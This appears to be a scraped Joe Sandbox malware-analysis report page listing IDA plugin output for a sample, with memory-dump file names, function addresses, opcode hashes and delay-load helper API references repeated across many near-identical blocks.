Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6ae0d5d256ff1c42a28a17eaea6f5e77c4cb2f855f50de57320153b25f084e08
Instruction ID: ee88a6a07c1ecaaf4fe0e896301c8bb66e48077282716a42890359d787a020b7
Opcode Fuzzy Hash: 6ae0d5d256ff1c42a28a17eaea6f5e77c4cb2f855f50de57320153b25f084e08
Instruction Fuzzy Hash: A9B012E2B6C102BE3108710C7C16D36130DCCD1F20330811BF48FD52C1D8409C084931

Function 00D6D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bc11a3278dd068c667dda938fdda6b872690a1bcb3b96c30e3f796c534c1648d
Instruction ID: 3d9f80c4ea161fbaaf6aa1998793e887117c0d59fdcb22756837489e075cf2b3
Opcode Fuzzy Hash: bc11a3278dd068c667dda938fdda6b872690a1bcb3b96c30e3f796c534c1648d
Instruction Fuzzy Hash: A8B012D2B6C242BE3148710C7C16D36130DC8D0B20330851BB04FD53C1D8409C8D4531

Function 00D6D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b2a85e253887e6818dd126f4670a8abcc39fc107c43290531cc2a5f6d41f90b3
Instruction ID: 6a4e7926280450692b8d44575ec9fa6c44e9347f7c35cd45ec0aad587d17e64f
Opcode Fuzzy Hash: b2a85e253887e6818dd126f4670a8abcc39fc107c43290531cc2a5f6d41f90b3
Instruction Fuzzy Hash: 1CB012D2B6C102BE310C750C7D17D36130DC8D0B20330801BB04FE53C1D8409C0E4531

Function 00D6D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 743e7421bbf9c017b86c2892e47a9940f03dd1b3cdcbbc55b8321738afa47b08
Instruction ID: 287befbbcfdd58313a4501a6b662abcf30689c63693a94f33ed14ed2f093e90a
Opcode Fuzzy Hash: 743e7421bbf9c017b86c2892e47a9940f03dd1b3cdcbbc55b8321738afa47b08
Instruction Fuzzy Hash: CFB012E2B6C102BE310C710C7D26D36130DC8D0F20330401BB08FE52C1D8409D094931

Function 00D6D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 93423ef12cdadf272b0ae66a762090b22b15b08820480ac1c2da214c17f6366c
Instruction ID: c60c002f6bd58a554238ab5bdd3fedabf8330e108349dc6b6c95d54cc3220676
Opcode Fuzzy Hash: 93423ef12cdadf272b0ae66a762090b22b15b08820480ac1c2da214c17f6366c
Instruction Fuzzy Hash: 6AB012E2B6C102BE310C710D7C16D36130DC8D0F20330401BB08FD52C1D8409C084931

Function 00D6D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2778bb5886ef10fefa2e0495f90661c6ca0bfe1158c9a8599a57f89f92e1339d
Instruction ID: 1fe2fa82d6dbc515c3e791518b64007d24b5d605554b1ca90de7bb047063f178
Opcode Fuzzy Hash: 2778bb5886ef10fefa2e0495f90661c6ca0bfe1158c9a8599a57f89f92e1339d
Instruction Fuzzy Hash: 49B012E2B6C202BE3148710C7C16D36130DC8D0F20330451BB08FD52C1D8409C484931

Function 00D6D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a51b149409de90a09c883e726c8b11388c2be57cbd5fe89b2d42c895787f3930
Instruction ID: 88d10132f2c13c58a2681dbff916ea2fffb1fbc95480c01d29162a30a2a7ce65
Opcode Fuzzy Hash: a51b149409de90a09c883e726c8b11388c2be57cbd5fe89b2d42c895787f3930
Instruction Fuzzy Hash: D7B012D6B6C302BE310831087C66C3F130DC8D0B20330492BB04BE41C1D8409C4C8431

Function 00D6D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2b296752f37f577b5f31ab66891849684bc63a572f61b5e8fd62a1ee9559f92e
Instruction ID: 5423f401b09b7daa0f0319701ba84ed9047ec86745d13a1e67060973a6e51e48
Opcode Fuzzy Hash: 2b296752f37f577b5f31ab66891849684bc63a572f61b5e8fd62a1ee9559f92e
Instruction Fuzzy Hash: 78B012D2B6C102BE3108750C7C16D36130DC8D1B20330C11BF44FD53C1D8409C0D4631

Function 00D6D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0779079d8121b808e3371bbdae448aae1d3a65716a6fc4350d0b9e6d6ded27cd
Instruction ID: 64cfec0c4d8afbdf13b13726c4b63c7c8600d3e2128ed29499d791e07ddbc0e9
Opcode Fuzzy Hash: 0779079d8121b808e3371bbdae448aae1d3a65716a6fc4350d0b9e6d6ded27cd
Instruction Fuzzy Hash: F8B012D6B6C202BE3108710C7C56D3F130DD8D0B20330401BB04BD52C1D8409C084631

Function 00D6D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2eb721f98778cee6ea3443e081b71c4609b2d1726da93084be7059b45a64aa9c
Instruction ID: 7cf2cc639224b8ef24b603bded40461cab5c2c428d8e81ec8c28d7501962f239
Opcode Fuzzy Hash: 2eb721f98778cee6ea3443e081b71c4609b2d1726da93084be7059b45a64aa9c
Instruction Fuzzy Hash: 9DB012E2B6C102BE310C710C7D16D36139DC8D0B20330401BB04BE52C1D8409C094531

Function 00D6D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a91b8f2e992c0b79d785cfa1a779348ee03daf5e9c4b8e7cfcaa38407a819738
Instruction ID: 777da26c7cfb9e8731023ddfd5181fe8e072687d99c9100cde7e099247705627
Opcode Fuzzy Hash: a91b8f2e992c0b79d785cfa1a779348ee03daf5e9c4b8e7cfcaa38407a819738
Instruction Fuzzy Hash: F5B012E2B6D602BE3148720C7C16D36130FC8D0B20330451BB04BD52C1D8409C484531

Function 00D6D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 003804bc1211735e77e619c39d326e51eba477c2e2ede05aa66bc72101364a03
Instruction ID: 0ce54aa6f43560bc36fcd6e152db250db9539da656ac0b8b7e88a92ca935add2
Opcode Fuzzy Hash: 003804bc1211735e77e619c39d326e51eba477c2e2ede05aa66bc72101364a03
Instruction Fuzzy Hash: 35B012D2B6D502BE3108710C7C16D36130FC8D1B20330811BF44BD52C1D8409C084531

Function 00D6D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 61cb501ab9f66c157922ca06e31c701f5bd0e1f96052c61908d26e545af43ff8
Instruction ID: 5b68302be5511f33bde76ee8a5c6bfdcf91408e42e3ef50c587c0210761b246d
Opcode Fuzzy Hash: 61cb501ab9f66c157922ca06e31c701f5bd0e1f96052c61908d26e545af43ff8
Instruction Fuzzy Hash: C6B012D2B7D502BE3108710C7C16D36234FCCD0B20330401BB04BD52C1D8409C084531

Function 00D6D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6c58cb49c4d36c4cabaedc791699987d799b22029210cfec97d02fb71d4068df
Instruction ID: 2ecb0bd3632693bc0604ebd0b9da355035fcc6cbe7147d2f7a541f5be77b72c8
Opcode Fuzzy Hash: 6c58cb49c4d36c4cabaedc791699987d799b22029210cfec97d02fb71d4068df
Instruction Fuzzy Hash: 15B012D2B6C102BE3108711C7C16D36135DC8D1B20330811BF54BD52C1D9409C084531

Function 00D6DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6e1236c772c7b24b0fb45e0a998568c1c1fdc968ad3d0070c84642f49e38ce7d
Instruction ID: e49dad6ae2f4fb0089532d0b8b9f84a5cc604c8d66a0f7ba0bb1c503cfd21235
Opcode Fuzzy Hash: 6e1236c772c7b24b0fb45e0a998568c1c1fdc968ad3d0070c84642f49e38ce7d
Instruction Fuzzy Hash: F7B012D276C002BE310871457C02E3E224FC4D4B20330851BB00BC0145D8448C0D4631

Function 00D6DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

